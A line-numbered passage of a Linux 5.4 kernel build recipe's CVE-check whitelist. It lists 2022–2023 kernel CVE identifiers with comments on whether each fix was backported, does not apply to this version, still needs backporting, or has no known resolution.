6841CVE_CHECK_WHITELIST += "CVE-2022-25636"
6842
6843# fixed-version: only affects 5.7rc1 onwards
6844CVE_CHECK_WHITELIST += "CVE-2022-2585"
6845
6846# cpe-stable-backport: Backported in 5.4.211
6847CVE_CHECK_WHITELIST += "CVE-2022-2586"
6848
6849# cpe-stable-backport: Backported in 5.4.211
6850CVE_CHECK_WHITELIST += "CVE-2022-2588"
6851
6852# fixed-version: only affects 5.16rc1 onwards
6853CVE_CHECK_WHITELIST += "CVE-2022-2590"
6854
6855# cpe-stable-backport: Backported in 5.4.220
6856CVE_CHECK_WHITELIST += "CVE-2022-2602"
6857
6858# cpe-stable-backport: Backported in 5.4.204
6859CVE_CHECK_WHITELIST += "CVE-2022-26365"
6860
6861# cpe-stable-backport: Backported in 5.4.210
6862CVE_CHECK_WHITELIST += "CVE-2022-26373"
6863
6864# cpe-stable-backport: Backported in 5.4.191
6865CVE_CHECK_WHITELIST += "CVE-2022-2639"
6866
6867# cpe-stable-backport: Backported in 5.4.188
6868CVE_CHECK_WHITELIST += "CVE-2022-26490"
6869
6870# cpe-stable-backport: Backported in 5.4.213
6871CVE_CHECK_WHITELIST += "CVE-2022-2663"
6872
6873# CVE-2022-26878 has no known resolution
6874
6875# cpe-stable-backport: Backported in 5.4.182
6876CVE_CHECK_WHITELIST += "CVE-2022-26966"
6877
6878# cpe-stable-backport: Backported in 5.4.182
6879CVE_CHECK_WHITELIST += "CVE-2022-27223"
6880
6881# cpe-stable-backport: Backported in 5.4.188
6882CVE_CHECK_WHITELIST += "CVE-2022-27666"
6883
6884# CVE-2022-27672 needs backporting (fixed from 6.2)
6885
6886# fixed-version: only affects 5.18rc1 onwards
6887CVE_CHECK_WHITELIST += "CVE-2022-2785"
6888
6889# fixed-version: only affects 5.15rc1 onwards
6890CVE_CHECK_WHITELIST += "CVE-2022-27950"
6891
6892# cpe-stable-backport: Backported in 5.4.188
6893CVE_CHECK_WHITELIST += "CVE-2022-28356"
6894
6895# cpe-stable-backport: Backported in 5.4.191
6896CVE_CHECK_WHITELIST += "CVE-2022-28388"
6897
6898# cpe-stable-backport: Backported in 5.4.189
6899CVE_CHECK_WHITELIST += "CVE-2022-28389"
6900
6901# cpe-stable-backport: Backported in 5.4.189
6902CVE_CHECK_WHITELIST += "CVE-2022-28390"
6903
6904# fixed-version: only affects 5.11rc1 onwards
6905CVE_CHECK_WHITELIST += "CVE-2022-2873"
6906
6907# fixed-version: only affects 5.17rc3 onwards
6908CVE_CHECK_WHITELIST += "CVE-2022-28796"
6909
6910# cpe-stable-backport: Backported in 5.4.196
6911CVE_CHECK_WHITELIST += "CVE-2022-28893"
6912
6913# fixed-version: only affects 5.5rc1 onwards
6914CVE_CHECK_WHITELIST += "CVE-2022-2905"
6915
6916# fixed-version: only affects 5.12rc1 onwards
6917CVE_CHECK_WHITELIST += "CVE-2022-29156"
6918
6919# cpe-stable-backport: Backported in 5.4.177
6920CVE_CHECK_WHITELIST += "CVE-2022-2938"
6921
6922# cpe-stable-backport: Backported in 5.4.191
6923CVE_CHECK_WHITELIST += "CVE-2022-29581"
6924
6925# fixed-version: only affects 5.5rc1 onwards
6926CVE_CHECK_WHITELIST += "CVE-2022-29582"
6927
6928# fixed-version: only affects 5.8rc1 onwards
6929CVE_CHECK_WHITELIST += "CVE-2022-2959"
6930
6931# CVE-2022-2961 has no known resolution
6932
6933# cpe-stable-backport: Backported in 5.4.180
6934CVE_CHECK_WHITELIST += "CVE-2022-2964"
6935
6936# cpe-stable-backport: Backported in 5.4.189
6937CVE_CHECK_WHITELIST += "CVE-2022-2977"
6938
6939# cpe-stable-backport: Backported in 5.4.218
6940CVE_CHECK_WHITELIST += "CVE-2022-2978"
6941
6942# cpe-stable-backport: Backported in 5.4.217
6943CVE_CHECK_WHITELIST += "CVE-2022-29900"
6944
6945# cpe-stable-backport: Backported in 5.4.217
6946CVE_CHECK_WHITELIST += "CVE-2022-29901"
6947
6948# CVE-2022-2991 needs backporting (fixed from 5.15rc1)
6949
6950# fixed-version: only affects 5.16rc1 onwards
6951CVE_CHECK_WHITELIST += "CVE-2022-29968"
6952
6953# cpe-stable-backport: Backported in 5.4.212
6954CVE_CHECK_WHITELIST += "CVE-2022-3028"
6955
6956# cpe-stable-backport: Backported in 5.4.189
6957CVE_CHECK_WHITELIST += "CVE-2022-30594"
6958
6959# CVE-2022-3061 needs backporting (fixed from 5.18rc5)
6960
6961# fixed-version: only affects 5.11rc1 onwards
6962CVE_CHECK_WHITELIST += "CVE-2022-3077"
6963
6964# fixed-version: only affects 5.10rc1 onwards
6965CVE_CHECK_WHITELIST += "CVE-2022-3078"
6966
6967# fixed-version: only affects 6.0rc1 onwards
6968CVE_CHECK_WHITELIST += "CVE-2022-3103"
6969
6970# fixed-version: only affects 5.7rc1 onwards
6971CVE_CHECK_WHITELIST += "CVE-2022-3104"
6972
6973# cpe-stable-backport: Backported in 5.4.171
6974CVE_CHECK_WHITELIST += "CVE-2022-3105"
6975
6976# fixed-version: only affects 5.9rc1 onwards
6977CVE_CHECK_WHITELIST += "CVE-2022-3106"
6978
6979# cpe-stable-backport: Backported in 5.4.187
6980CVE_CHECK_WHITELIST += "CVE-2022-3107"
6981
6982# CVE-2022-3108 needs backporting (fixed from 5.17rc1)
6983
6984# fixed-version: only affects 5.15rc1 onwards
6985CVE_CHECK_WHITELIST += "CVE-2022-3110"
6986
6987# cpe-stable-backport: Backported in 5.4.189
6988CVE_CHECK_WHITELIST += "CVE-2022-3111"
6989
6990# fixed-version: only affects 5.7rc1 onwards
6991CVE_CHECK_WHITELIST += "CVE-2022-3112"
6992
6993# fixed-version: only affects 5.10rc6 onwards
6994CVE_CHECK_WHITELIST += "CVE-2022-3113"
6995
6996# fixed-version: only affects 5.13rc1 onwards
6997CVE_CHECK_WHITELIST += "CVE-2022-3114"
6998
6999# cpe-stable-backport: Backported in 5.4.198
7000CVE_CHECK_WHITELIST += "CVE-2022-3115"
7001
7002# cpe-stable-backport: Backported in 5.4.226
7003CVE_CHECK_WHITELIST += "CVE-2022-3169"
7004
7005# fixed-version: only affects 6.0rc1 onwards
7006CVE_CHECK_WHITELIST += "CVE-2022-3170"
7007
7008# CVE-2022-3176 needs backporting (fixed from 5.17rc1)
7009
7010# cpe-stable-backport: Backported in 5.4.189
7011CVE_CHECK_WHITELIST += "CVE-2022-3202"
7012
7013# cpe-stable-backport: Backported in 5.4.198
7014CVE_CHECK_WHITELIST += "CVE-2022-32250"
7015
7016# cpe-stable-backport: Backported in 5.4.201
7017CVE_CHECK_WHITELIST += "CVE-2022-32296"
7018
7019# CVE-2022-3238 has no known resolution
7020
7021# cpe-stable-backport: Backported in 5.4.189
7022CVE_CHECK_WHITELIST += "CVE-2022-3239"
7023
7024# cpe-stable-backport: Backported in 5.4.198
7025CVE_CHECK_WHITELIST += "CVE-2022-32981"
7026
7027# cpe-stable-backport: Backported in 5.4.215
7028CVE_CHECK_WHITELIST += "CVE-2022-3303"
7029
7030# CVE-2022-3344 needs backporting (fixed from 6.1rc7)
7031
7032# cpe-stable-backport: Backported in 5.4.204
7033CVE_CHECK_WHITELIST += "CVE-2022-33740"
7034
7035# cpe-stable-backport: Backported in 5.4.204
7036CVE_CHECK_WHITELIST += "CVE-2022-33741"
7037
7038# cpe-stable-backport: Backported in 5.4.204
7039CVE_CHECK_WHITELIST += "CVE-2022-33742"
7040
7041# fixed-version: only affects 5.9rc1 onwards
7042CVE_CHECK_WHITELIST += "CVE-2022-33743"
7043
7044# cpe-stable-backport: Backported in 5.4.204
7045CVE_CHECK_WHITELIST += "CVE-2022-33744"
7046
7047# cpe-stable-backport: Backported in 5.4.192
7048CVE_CHECK_WHITELIST += "CVE-2022-33981"
7049
7050# cpe-stable-backport: Backported in 5.4.229
7051CVE_CHECK_WHITELIST += "CVE-2022-3424"
7052
7053# fixed-version: only affects 5.18rc2 onwards
7054CVE_CHECK_WHITELIST += "CVE-2022-3435"
7055
7056# fixed-version: only affects 5.13rc1 onwards
7057CVE_CHECK_WHITELIST += "CVE-2022-34494"
7058
7059# fixed-version: only affects 5.13rc1 onwards
7060CVE_CHECK_WHITELIST += "CVE-2022-34495"
7061
7062# cpe-stable-backport: Backported in 5.4.244
7063CVE_CHECK_WHITELIST += "CVE-2022-34918"
7064
7065# cpe-stable-backport: Backported in 5.4.225
7066CVE_CHECK_WHITELIST += "CVE-2022-3521"
7067
7068# CVE-2022-3522 needs backporting (fixed from 6.1rc1)
7069
7070# CVE-2022-3523 needs backporting (fixed from 6.1rc1)
7071
7072# cpe-stable-backport: Backported in 5.4.224
7073CVE_CHECK_WHITELIST += "CVE-2022-3524"
7074
7075# fixed-version: only affects 5.13rc1 onwards
7076CVE_CHECK_WHITELIST += "CVE-2022-3526"
7077
7078# fixed-version: only affects 5.19rc1 onwards
7079CVE_CHECK_WHITELIST += "CVE-2022-3531"
7080
7081# fixed-version: only affects 6.1rc1 onwards
7082CVE_CHECK_WHITELIST += "CVE-2022-3532"
7083
7084# CVE-2022-3533 has no known resolution
7085
7086# CVE-2022-3534 needs backporting (fixed from 6.2rc1)
7087
7088# cpe-stable-backport: Backported in 5.4.220
7089CVE_CHECK_WHITELIST += "CVE-2022-3535"
7090
7091# fixed-version: only affects 5.19rc1 onwards
7092CVE_CHECK_WHITELIST += "CVE-2022-3541"
7093
7094# cpe-stable-backport: Backported in 5.4.220
7095CVE_CHECK_WHITELIST += "CVE-2022-3542"
7096
7097# fixed-version: only affects 5.15rc1 onwards
7098CVE_CHECK_WHITELIST += "CVE-2022-3543"
7099
7100# CVE-2022-3544 has no known resolution
7101
7102# cpe-stable-backport: Backported in 5.4.228
7103CVE_CHECK_WHITELIST += "CVE-2022-3545"
7104
7105# cpe-stable-backport: Backported in 5.4.224
7106CVE_CHECK_WHITELIST += "CVE-2022-3564"
7107
7108# cpe-stable-backport: Backported in 5.4.220
7109CVE_CHECK_WHITELIST += "CVE-2022-3565"
7110
7111# CVE-2022-3566 needs backporting (fixed from 6.1rc1)
7112
7113# CVE-2022-3567 needs backporting (fixed from 6.1rc1)
7114
7115# cpe-stable-backport: Backported in 5.4.198
7116CVE_CHECK_WHITELIST += "CVE-2022-3577"
7117
7118# cpe-stable-backport: Backported in 5.4.213
7119CVE_CHECK_WHITELIST += "CVE-2022-3586"
7120
7121# cpe-stable-backport: Backported in 5.4.220
7122CVE_CHECK_WHITELIST += "CVE-2022-3594"
7123
7124# CVE-2022-3595 needs backporting (fixed from 6.1rc1)
7125
7126# CVE-2022-3606 has no known resolution
7127
7128# cpe-stable-backport: Backported in 5.4.207
7129CVE_CHECK_WHITELIST += "CVE-2022-36123"
7130
7131# fixed-version: only affects 5.12rc1 onwards
7132CVE_CHECK_WHITELIST += "CVE-2022-3619"
7133
7134# cpe-stable-backport: Backported in 5.4.218
7135CVE_CHECK_WHITELIST += "CVE-2022-3621"
7136
7137# cpe-stable-backport: Backported in 5.4.228
7138CVE_CHECK_WHITELIST += "CVE-2022-3623"
7139
7140# CVE-2022-3624 needs backporting (fixed from 6.0rc1)
7141
7142# cpe-stable-backport: Backported in 5.4.211
7143CVE_CHECK_WHITELIST += "CVE-2022-3625"
7144
7145# cpe-stable-backport: Backported in 5.4.224
7146CVE_CHECK_WHITELIST += "CVE-2022-3628"
7147
7148# cpe-stable-backport: Backported in 5.4.229
7149CVE_CHECK_WHITELIST += "CVE-2022-36280"
7150
7151# cpe-stable-backport: Backported in 5.4.211
7152CVE_CHECK_WHITELIST += "CVE-2022-3629"
7153
7154# fixed-version: only affects 5.19rc6 onwards
7155CVE_CHECK_WHITELIST += "CVE-2022-3630"
7156
7157# cpe-stable-backport: Backported in 5.4.211
7158CVE_CHECK_WHITELIST += "CVE-2022-3633"
7159
7160# cpe-stable-backport: Backported in 5.4.211
7161CVE_CHECK_WHITELIST += "CVE-2022-3635"
7162
7163# CVE-2022-3636 needs backporting (fixed from 5.19rc1)
7164
7165# fixed-version: only affects 5.19 onwards
7166CVE_CHECK_WHITELIST += "CVE-2022-3640"
7167
7168# CVE-2022-36402 needs backporting (fixed from 6.5)
7169
7170# CVE-2022-3642 has no known resolution
7171
7172# cpe-stable-backport: Backported in 5.4.227
7173CVE_CHECK_WHITELIST += "CVE-2022-3643"
7174
7175# cpe-stable-backport: Backported in 5.4.218
7176CVE_CHECK_WHITELIST += "CVE-2022-3646"
7177
7178# cpe-stable-backport: Backported in 5.4.220
7179CVE_CHECK_WHITELIST += "CVE-2022-3649"
7180
7181# cpe-stable-backport: Backported in 5.4.208
7182CVE_CHECK_WHITELIST += "CVE-2022-36879"
7183
7184# cpe-stable-backport: Backported in 5.4.209
7185CVE_CHECK_WHITELIST += "CVE-2022-36946"
7186
7187# cpe-stable-backport: Backported in 5.4.233
7188CVE_CHECK_WHITELIST += "CVE-2022-3707"
7189
7190# CVE-2022-38096 has no known resolution
7191
7192# CVE-2022-38457 needs backporting (fixed from 6.2rc4)
7193
7194# CVE-2022-3903 needs backporting (fixed from 6.1rc2)
7195
7196# fixed-version: only affects 5.18 onwards
7197CVE_CHECK_WHITELIST += "CVE-2022-3910"
7198
7199# CVE-2022-39188 needs backporting (fixed from 5.19rc8)
7200
7201# cpe-stable-backport: Backported in 5.4.244
7202CVE_CHECK_WHITELIST += "CVE-2022-39189"
7203
7204# fixed-version: only affects 5.9rc1 onwards
7205CVE_CHECK_WHITELIST += "CVE-2022-39190"
7206
7207# fixed-version: only affects 5.18rc1 onwards
7208CVE_CHECK_WHITELIST += "CVE-2022-3977"
7209
7210# cpe-stable-backport: Backported in 5.4.215
7211CVE_CHECK_WHITELIST += "CVE-2022-39842"
7212
7213# CVE-2022-40133 needs backporting (fixed from 6.2rc4)
7214
7215# cpe-stable-backport: Backported in 5.4.213
7216CVE_CHECK_WHITELIST += "CVE-2022-40307"
7217
7218# fixed-version: only affects 5.19rc1 onwards
7219CVE_CHECK_WHITELIST += "CVE-2022-40476"
7220
7221# cpe-stable-backport: Backported in 5.4.218
7222CVE_CHECK_WHITELIST += "CVE-2022-40768"
7223
7224# cpe-stable-backport: Backported in 5.4.213
7225CVE_CHECK_WHITELIST += "CVE-2022-4095"
7226
7227# cpe-stable-backport: Backported in 5.4.252
7228CVE_CHECK_WHITELIST += "CVE-2022-40982"
7229
7230# cpe-stable-backport: Backported in 5.4.229
7231CVE_CHECK_WHITELIST += "CVE-2022-41218"
7232
7233# cpe-stable-backport: Backported in 5.4.211
7234CVE_CHECK_WHITELIST += "CVE-2022-41222"
7235
7236# fixed-version: only affects 5.19rc1 onwards
7237CVE_CHECK_WHITELIST += "CVE-2022-4127"
7238
7239# fixed-version: only affects 5.17rc1 onwards
7240CVE_CHECK_WHITELIST += "CVE-2022-4128"
7241
7242# cpe-stable-backport: Backported in 5.4.231
7243CVE_CHECK_WHITELIST += "CVE-2022-4129"
7244
7245# fixed-version: only affects 5.17rc2 onwards
7246CVE_CHECK_WHITELIST += "CVE-2022-4139"
7247
7248# cpe-stable-backport: Backported in 5.4.218
7249CVE_CHECK_WHITELIST += "CVE-2022-41674"
7250
7251# CVE-2022-41848 has no known resolution
7252
7253# cpe-stable-backport: Backported in 5.4.220
7254CVE_CHECK_WHITELIST += "CVE-2022-41849"
7255
7256# cpe-stable-backport: Backported in 5.4.220
7257CVE_CHECK_WHITELIST += "CVE-2022-41850"
7258
7259# cpe-stable-backport: Backported in 5.4.190
7260CVE_CHECK_WHITELIST += "CVE-2022-41858"
7261
7262# fixed-version: only affects 5.16rc7 onwards
7263CVE_CHECK_WHITELIST += "CVE-2022-42328"
7264
7265# fixed-version: only affects 5.16rc7 onwards
7266CVE_CHECK_WHITELIST += "CVE-2022-42329"
7267
7268# cpe-stable-backport: Backported in 5.4.215
7269CVE_CHECK_WHITELIST += "CVE-2022-42432"
7270
7271# CVE-2022-4269 needs backporting (fixed from 6.3rc1)
7272
7273# cpe-stable-backport: Backported in 5.4.212
7274CVE_CHECK_WHITELIST += "CVE-2022-42703"
7275
7276# cpe-stable-backport: Backported in 5.4.219
7277CVE_CHECK_WHITELIST += "CVE-2022-42719"
7278
7279# cpe-stable-backport: Backported in 5.4.218
7280CVE_CHECK_WHITELIST += "CVE-2022-42720"
7281
7282# cpe-stable-backport: Backported in 5.4.218
7283CVE_CHECK_WHITELIST += "CVE-2022-42721"
7284
7285# fixed-version: only affects 5.8rc1 onwards
7286CVE_CHECK_WHITELIST += "CVE-2022-42722"
7287
7288# cpe-stable-backport: Backported in 5.4.224
7289CVE_CHECK_WHITELIST += "CVE-2022-42895"
7290
7291# cpe-stable-backport: Backported in 5.4.226
7292CVE_CHECK_WHITELIST += "CVE-2022-42896"
7293
7294# cpe-stable-backport: Backported in 5.4.218
7295CVE_CHECK_WHITELIST += "CVE-2022-43750"
7296
7297# fixed-version: only affects 5.8rc1 onwards
7298CVE_CHECK_WHITELIST += "CVE-2022-4378"
7299
7300# fixed-version: only affects 5.6rc1 onwards
7301CVE_CHECK_WHITELIST += "CVE-2022-4379"
7302
7303# cpe-stable-backport: Backported in 5.4.230
7304CVE_CHECK_WHITELIST += "CVE-2022-4382"
7305
7306# fixed-version: only affects 5.11rc1 onwards
7307CVE_CHECK_WHITELIST += "CVE-2022-43945"
7308
7309# CVE-2022-44032 needs backporting (fixed from 6.4rc1)
7310
7311# CVE-2022-44033 needs backporting (fixed from 6.4rc1)
7312
7313# CVE-2022-44034 needs backporting (fixed from 6.4rc1)
7314
7315# CVE-2022-4543 has no known resolution
7316
7317# fixed-version: only affects 5.12rc1 onwards
7318CVE_CHECK_WHITELIST += "CVE-2022-45869"
7319
7320# CVE-2022-45884 has no known resolution
7321
7322# CVE-2022-45885 has no known resolution
7323
7324# cpe-stable-backport: Backported in 5.4.246
7325CVE_CHECK_WHITELIST += "CVE-2022-45886"
7326
7327# cpe-stable-backport: Backported in 5.4.246
7328CVE_CHECK_WHITELIST += "CVE-2022-45887"
7329
7330# fixed-version: only affects 5.14rc1 onwards
7331CVE_CHECK_WHITELIST += "CVE-2022-45888"
7332
7333# cpe-stable-backport: Backported in 5.4.246
7334CVE_CHECK_WHITELIST += "CVE-2022-45919"
7335
7336# cpe-stable-backport: Backported in 5.4.229
7337CVE_CHECK_WHITELIST += "CVE-2022-45934"
7338
7339# cpe-stable-backport: Backported in 5.4.213
7340CVE_CHECK_WHITELIST += "CVE-2022-4662"
7341
7342# fixed-version: only affects 5.10rc1 onwards
7343CVE_CHECK_WHITELIST += "CVE-2022-4696"
7344
7345# cpe-stable-backport: Backported in 5.4.240
7346CVE_CHECK_WHITELIST += "CVE-2022-4744"
7347
7348# fixed-version: only affects 5.7rc1 onwards
7349CVE_CHECK_WHITELIST += "CVE-2022-47518"
7350
7351# fixed-version: only affects 5.7rc1 onwards
7352CVE_CHECK_WHITELIST += "CVE-2022-47519"
7353
7354# CVE-2022-47520 needs backporting (fixed from 6.1rc8)
7355
7356# fixed-version: only affects 5.7rc1 onwards
7357CVE_CHECK_WHITELIST += "CVE-2022-47521"
7358
7359# cpe-stable-backport: Backported in 5.4.229
7360CVE_CHECK_WHITELIST += "CVE-2022-47929"
7361
7362# fixed-version: only affects 5.15rc1 onwards
7363CVE_CHECK_WHITELIST += "CVE-2022-47938"
7364
7365# fixed-version: only affects 5.15rc1 onwards
7366CVE_CHECK_WHITELIST += "CVE-2022-47939"
7367
7368# fixed-version: only affects 5.15rc1 onwards
7369CVE_CHECK_WHITELIST += "CVE-2022-47940"
7370
7371# fixed-version: only affects 5.15rc1 onwards
7372CVE_CHECK_WHITELIST += "CVE-2022-47941"
7373
7374# fixed-version: only affects 5.15rc1 onwards
7375CVE_CHECK_WHITELIST += "CVE-2022-47942"
7376
7377# fixed-version: only affects 5.15rc1 onwards
7378CVE_CHECK_WHITELIST += "CVE-2022-47943"
7379
7380# CVE-2022-47946 needs backporting (fixed from 5.12rc2)
7381
7382# fixed-version: only affects 5.15rc1 onwards
7383CVE_CHECK_WHITELIST += "CVE-2022-4842"
7384
7385# fixed-version: only affects 5.15rc1 onwards
7386CVE_CHECK_WHITELIST += "CVE-2022-48423"
7387
7388# fixed-version: only affects 5.15rc1 onwards
7389CVE_CHECK_WHITELIST += "CVE-2022-48424"
7390
7391# fixed-version: only affects 5.15rc1 onwards
7392CVE_CHECK_WHITELIST += "CVE-2022-48425"
7393
7394# fixed-version: only affects 5.15rc1 onwards
7395CVE_CHECK_WHITELIST += "CVE-2022-48502"
7396
7397# cpe-stable-backport: Backported in 5.4.196
7398CVE_CHECK_WHITELIST += "CVE-2022-48619"
7399
7400# cpe-stable-backport: Backported in 5.4.179
7401CVE_CHECK_WHITELIST += "CVE-2022-48626"
7402
7403# CVE-2022-48627 needs backporting (fixed from 5.19rc7)
7404
7405# CVE-2022-48628 needs backporting (fixed from 6.6rc1)
7406
7407# cpe-stable-backport: Backported in 5.4.187
7408CVE_CHECK_WHITELIST += "CVE-2022-48629"
7409
7410# fixed-version: only affects 5.17 onwards
7411CVE_CHECK_WHITELIST += "CVE-2022-48630"
7412
7413# fixed-version: Fixed after version 5.0rc1
7414CVE_CHECK_WHITELIST += "CVE-2023-0030"
7415
7416# cpe-stable-backport: Backported in 5.4.229
7417CVE_CHECK_WHITELIST += "CVE-2023-0045"
7418
7419# cpe-stable-backport: Backported in 5.4.160
7420CVE_CHECK_WHITELIST += "CVE-2023-0047"
7421
7422# fixed-version: only affects 6.0rc1 onwards
7423CVE_CHECK_WHITELIST += "CVE-2023-0122"
7424
7425# cpe-stable-backport: Backported in 5.4.243
7426CVE_CHECK_WHITELIST += "CVE-2023-0160"
7427
7428# fixed-version: only affects 5.5rc1 onwards
7429CVE_CHECK_WHITELIST += "CVE-2023-0179"
7430
7431# fixed-version: only affects 5.15rc1 onwards
7432CVE_CHECK_WHITELIST += "CVE-2023-0210"
7433
7434# CVE-2023-0240 needs backporting (fixed from 5.10rc1)
7435
7436# cpe-stable-backport: Backported in 5.4.229
7437CVE_CHECK_WHITELIST += "CVE-2023-0266"
7438
7439# CVE-2023-0386 needs backporting (fixed from 6.2rc6)
7440
7441# cpe-stable-backport: Backported in 5.4.229
7442CVE_CHECK_WHITELIST += "CVE-2023-0394"
7443
7444# cpe-stable-backport: Backported in 5.4.230
7445CVE_CHECK_WHITELIST += "CVE-2023-0458"
7446
7447# cpe-stable-backport: Backported in 5.4.233
7448CVE_CHECK_WHITELIST += "CVE-2023-0459"
7449
7450# cpe-stable-backport: Backported in 5.4.229
7451CVE_CHECK_WHITELIST += "CVE-2023-0461"
7452
7453# fixed-version: only affects 5.17rc1 onwards
7454CVE_CHECK_WHITELIST += "CVE-2023-0468"
7455
7456# fixed-version: only affects 5.19rc1 onwards
7457CVE_CHECK_WHITELIST += "CVE-2023-0469"
7458
7459# cpe-stable-backport: Backported in 5.4.240
7460CVE_CHECK_WHITELIST += "CVE-2023-0590"
7461
7462# CVE-2023-0597 needs backporting (fixed from 6.2rc1)
7463
7464# cpe-stable-backport: Backported in 5.4.223
7465CVE_CHECK_WHITELIST += "CVE-2023-0615"
7466
7467# fixed-version: only affects 5.19rc1 onwards
7468CVE_CHECK_WHITELIST += "CVE-2023-1032"
7469
7470# cpe-stable-backport: Backported in 5.4.231
7471CVE_CHECK_WHITELIST += "CVE-2023-1073"
7472
7473# cpe-stable-backport: Backported in 5.4.231
7474CVE_CHECK_WHITELIST += "CVE-2023-1074"
7475
7476# CVE-2023-1075 needs backporting (fixed from 6.2rc7)
7477
7478# cpe-stable-backport: Backported in 5.4.235
7479CVE_CHECK_WHITELIST += "CVE-2023-1076"
7480
7481# cpe-stable-backport: Backported in 5.4.235
7482CVE_CHECK_WHITELIST += "CVE-2023-1077"
7483
7484# cpe-stable-backport: Backported in 5.4.232
7485CVE_CHECK_WHITELIST += "CVE-2023-1078"
7486
7487# cpe-stable-backport: Backported in 5.4.235
7488CVE_CHECK_WHITELIST += "CVE-2023-1079"
7489
7490# cpe-stable-backport: Backported in 5.4.211
7491CVE_CHECK_WHITELIST += "CVE-2023-1095"
7492
7493# cpe-stable-backport: Backported in 5.4.235
7494CVE_CHECK_WHITELIST += "CVE-2023-1118"
7495
7496# fixed-version: only affects 5.15rc1 onwards
7497CVE_CHECK_WHITELIST += "CVE-2023-1192"
7498
7499# fixed-version: only affects 5.15rc1 onwards
7500CVE_CHECK_WHITELIST += "CVE-2023-1193"
7501
7502# fixed-version: only affects 5.15rc1 onwards
7503CVE_CHECK_WHITELIST += "CVE-2023-1194"
7504
7505# fixed-version: only affects 5.16rc1 onwards
7506CVE_CHECK_WHITELIST += "CVE-2023-1195"
7507
7508# cpe-stable-backport: Backported in 5.4.253
7509CVE_CHECK_WHITELIST += "CVE-2023-1206"
7510
7511# CVE-2023-1249 needs backporting (fixed from 5.18rc1)
7512
7513# fixed-version: only affects 5.6rc1 onwards
7514CVE_CHECK_WHITELIST += "CVE-2023-1252"
7515
7516# CVE-2023-1281 needs backporting (fixed from 6.2)
7517
7518# fixed-version: only affects 5.6rc1 onwards
7519CVE_CHECK_WHITELIST += "CVE-2023-1295"
7520
7521# cpe-stable-backport: Backported in 5.4.243
7522CVE_CHECK_WHITELIST += "CVE-2023-1380"
7523
7524# cpe-stable-backport: Backported in 5.4.226
7525CVE_CHECK_WHITELIST += "CVE-2023-1382"
7526
7527# cpe-stable-backport: Backported in 5.4.92
7528CVE_CHECK_WHITELIST += "CVE-2023-1390"
7529
7530# CVE-2023-1476 has no known resolution
7531
7532# cpe-stable-backport: Backported in 5.4.232
7533CVE_CHECK_WHITELIST += "CVE-2023-1513"
7534
7535# CVE-2023-1582 needs backporting (fixed from 5.17rc4)
7536
7537# fixed-version: only affects 5.19rc1 onwards
7538CVE_CHECK_WHITELIST += "CVE-2023-1583"
7539
7540# cpe-stable-backport: Backported in 5.4.253
7541CVE_CHECK_WHITELIST += "CVE-2023-1611"
7542
7543# cpe-stable-backport: Backported in 5.4.189
7544CVE_CHECK_WHITELIST += "CVE-2023-1637"
7545
7546# fixed-version: only affects 5.14rc1 onwards
7547CVE_CHECK_WHITELIST += "CVE-2023-1652"
7548
7549# cpe-stable-backport: Backported in 5.4.240
7550CVE_CHECK_WHITELIST += "CVE-2023-1670"
7551
7552# cpe-stable-backport: Backported in 5.4.235
7553CVE_CHECK_WHITELIST += "CVE-2023-1829"
7554
7555# cpe-stable-backport: Backported in 5.4.196
7556CVE_CHECK_WHITELIST += "CVE-2023-1838"
7557
7558# cpe-stable-backport: Backported in 5.4.238
7559CVE_CHECK_WHITELIST += "CVE-2023-1855"
7560
7561# cpe-stable-backport: Backported in 5.4.241
7562CVE_CHECK_WHITELIST += "CVE-2023-1859"
7563
7564# fixed-version: only affects 5.7rc1 onwards
7565CVE_CHECK_WHITELIST += "CVE-2023-1872"
7566
7567# cpe-stable-backport: Backported in 5.4.240
7568CVE_CHECK_WHITELIST += "CVE-2023-1989"
7569
7570# cpe-stable-backport: Backported in 5.4.238
7571CVE_CHECK_WHITELIST += "CVE-2023-1990"
7572
7573# fixed-version: only affects 5.19rc7 onwards
7574CVE_CHECK_WHITELIST += "CVE-2023-1998"
7575
7576# cpe-stable-backport: Backported in 5.4.243
7577CVE_CHECK_WHITELIST += "CVE-2023-2002"
7578
7579# fixed-version: only affects 5.10rc1 onwards
7580CVE_CHECK_WHITELIST += "CVE-2023-2006"
7581
7582# CVE-2023-2007 needs backporting (fixed from 6.0rc1)
7583
7584# cpe-stable-backport: Backported in 5.4.202
7585CVE_CHECK_WHITELIST += "CVE-2023-2008"
7586
7587# fixed-version: only affects 5.12rc1 onwards
7588CVE_CHECK_WHITELIST += "CVE-2023-2019"
7589
7590# cpe-stable-backport: Backported in 5.4.252
7591CVE_CHECK_WHITELIST += "CVE-2023-20569"
7592
7593# CVE-2023-20588 needs backporting (fixed from 6.5rc6)
7594
7595# cpe-stable-backport: Backported in 5.4.250
7596CVE_CHECK_WHITELIST += "CVE-2023-20593"
7597
7598# CVE-2023-20928 needs backporting (fixed from 6.0rc1)
7599
7600# CVE-2023-20937 has no known resolution
7601
7602# fixed-version: only affects 5.17rc1 onwards
7603CVE_CHECK_WHITELIST += "CVE-2023-20938"
7604
7605# CVE-2023-20941 has no known resolution
7606
7607# fixed-version: only affects 5.14rc1 onwards
7608CVE_CHECK_WHITELIST += "CVE-2023-21102"
7609
7610# fixed-version: only affects 5.19rc1 onwards
7611CVE_CHECK_WHITELIST += "CVE-2023-21106"
7612
7613# cpe-stable-backport: Backported in 5.4.249
7614CVE_CHECK_WHITELIST += "CVE-2023-2124"
7615
7616# fixed-version: only affects 5.16rc1 onwards
7617CVE_CHECK_WHITELIST += "CVE-2023-21255"
7618
7619# fixed-version: only affects 5.17rc1 onwards
7620CVE_CHECK_WHITELIST += "CVE-2023-21264"
7621
7622# CVE-2023-21400 has no known resolution
7623
7624# fixed-version: only affects 5.7rc1 onwards
7625CVE_CHECK_WHITELIST += "CVE-2023-2156"
7626
7627# cpe-stable-backport: Backported in 5.4.232
7628CVE_CHECK_WHITELIST += "CVE-2023-2162"
7629
7630# cpe-stable-backport: Backported in 5.4.242
7631CVE_CHECK_WHITELIST += "CVE-2023-2163"
7632
7633# fixed-version: only affects 5.12rc1 onwards
7634CVE_CHECK_WHITELIST += "CVE-2023-2166"
7635
7636# CVE-2023-2176 needs backporting (fixed from 6.3rc1)
7637
7638# cpe-stable-backport: Backported in 5.4.209
7639CVE_CHECK_WHITELIST += "CVE-2023-2177"
7640
7641# cpe-stable-backport: Backported in 5.4.240
7642CVE_CHECK_WHITELIST += "CVE-2023-2194"
7643
7644# fixed-version: only affects 5.13rc1 onwards
7645CVE_CHECK_WHITELIST += "CVE-2023-2235"
7646
7647# fixed-version: only affects 5.19rc1 onwards
7648CVE_CHECK_WHITELIST += "CVE-2023-2236"
7649
